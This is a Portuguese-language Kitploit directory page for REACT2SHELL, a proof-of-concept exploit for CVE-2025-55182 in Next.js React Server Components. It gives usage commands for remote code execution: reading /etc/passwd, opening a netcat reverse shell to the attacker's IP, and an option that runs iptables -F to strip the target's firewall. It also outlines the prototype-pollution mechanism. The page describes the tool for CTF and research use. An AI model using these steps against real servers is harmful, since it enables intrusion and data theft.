Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
WEB-CLI_RCE_React2Shell — WEB-CLI_RCE_React2Shell é uma ferramenta de exploit PoC educacional para CVE-2025-55182, uma falha crítica de Prototype Pollution em aplicações Next.js usando React Server Components. Projetado para CTFs e pesquisa, apresenta um modo de comando único, um CLI web interativo e capacidades de reverse shell para demonstrar RCE. | Kitploit
Ferramentas/GitHubGitHub/raivenlockdown/web-cli_rce_react2shell
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHub
raivenlockdown/web-cli_rce_react2shell

WEB-CLI_RCE_React2Shell

Ver Repositório
5há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

WEB-CLI_RCE_React2Shell é uma ferramenta de exploit PoC educacional para CVE-2025-55182, uma falha crítica de Prototype Pollution em aplicações Next.js usando React Server Components. Projetado para CTFs e pesquisa, apresenta um modo de comando único, um CLI web interativo e capacidades de reverse shell para demonstrar RCE.

Compartilhar

REACT2SHELL

🎯 Visão Geral Rápida (O que é isso?)

Esta ferramenta é uma simples prova de conceito (PoC) de exploração para CVE-2025-55182. Esta é uma falha grave (Poluição de Protótipo) encontrada em aplicações Next.js que usam React Server Components.

Se um servidor alvo estiver vulnerável, este script permite executar comandos do sistema operacional nele (Execução Remota de Código, ou RCE).

Esta ferramenta foi construída para aprendizado, CTFs e pesquisa de segurança responsável.

Screenshot 2025-12-12 214115

⚠️ Aviso para Estudantes e Jogadores de CTF

USE ETICAMENTE. Execute este exploit apenas contra sistemas que você possui ou para os quais tenha permissão explícita e documentada para testar. O uso não autorizado é ilegal. Esta ferramenta é apenas para fins educacionais.

🌟 Como Usar

Esta ferramenta tem três formas principais de executar comandos: um comando único simples, um console web interativo completo e uma tentativa de um shell reverso clássico.

⚙️ Instalação

Obtenha o código:
root@kitploit:~
git clone https://github.com/raivenLockdown/WEB-CLI_RCE_React2Shell.git
cd REACT2SHELL
  • Instale a biblioteca:

    root@kitploit:~
    pip install requests
    
  • Modo 1: Console Web Interativo (Recomendado para CTFs)

    Esta é a forma mais fácil de interagir com o alvo. Inicia uma página web local na sua máquina que funciona como um terminal.

    1. Execute o script:

      root@kitploit:~
      python3 exploit.py <TARGET_URL> --web-cli
      

      Exemplo: python3 exploit.py http://target.com/ --web-cli

    2. Abra seu navegador: O script dirá para abrir http://127.0.0.1:8000/. Você pode então digitar comandos (como ls, whoami, cat /etc/passwd) diretamente na página web.

    Modo 2: Execução de Comando Único

    Execute um comando e obtenha a saída imediatamente no seu terminal local. Bom para verificações rápidas como descobrir seu ID de usuário.

    root@kitploit:~
    python3 exploit.py <TARGET_URL> --cmd '<COMMAND>'
    

    Exemplo: python3 exploit.py http://target.com/ --cmd 'id'

    Modo 3: Tentativa de Shell Reverso

    Use este modo se quiser uma conexão estável e persistente. Nota: Isto frequentemente falha em ambientes reais devido a firewalls (filtragem de saída).

    1. Inicie seu listener (ex.: netcat):

      root@kitploit:~
      nc -lvnp 55555
      
    2. Execute o exploit:

      root@kitploit:~
      python3 exploit.py <TARGET_URL> -i <YOUR_IP> -p 55555 [--flush]
      
      • -i <YOUR_IP>: O IP da sua máquina.
      • -p 55555: A porta que seu listener está usando.
      • --flush (Opcional): Tenta executar iptables -F no alvo primeiro para limpar firewalls do host.

    🔬 Explicação Técnica (Como o Exploit Funciona)

    O exploit usa uma falha de Poluição de Protótipo para alcançar RCE.

    1. Poluição de Protótipo: O script envia um payload especialmente criado para um endpoint Next.js vulnerável. Esse payload explora uma falha na forma como o servidor processa dados, permitindo adicionar propriedades à estrutura básica de objetos JavaScript (Object.prototype).
    2. Gatilho de RCE: Poluímos uma propriedade interna específica que controla qual código o servidor executa (usando child_process do Node.js). Substituímos o valor dessa propriedade pelo nosso comando shell.
    3. Captura de Saída: Ao executar comandos nos modos de comando único ou web CLI, o exploit faz o servidor executar o comando (execSync) e imediatamente lançar um erro inofensivo. A saída do comando é habilmente inserida no campo digest da mensagem de erro. O script Python então lê esse campo para obter os resultados.

    🤝 Referências e Créditos

    Esta pesquisa depende do trabalho inicial e divulgação pela comunidade de segurança. Agradecemos a todos os pesquisadores e contribuidores de código aberto.

    📚 Referências Principais

    • Repositório PoC Original para CVE-2025-55182 - (A base para este exploit.)
    • Exemplo de Código PoC Original - (O exemplo de código inicial.)
    • Vulnerabilidade de Segurança Crítica em React Server Components - (Postagem oficial do blog React sobre o problema.)
    • Vulnerabilidade Crítica no React (CVE-2025-55182) - (Análise de segurança detalhada.)
    • Documentação de Funções de Servidor React - (Documentação oficial explicando o contexto de como os componentes vulneráveis funcionam.)
    Baixar ferramenta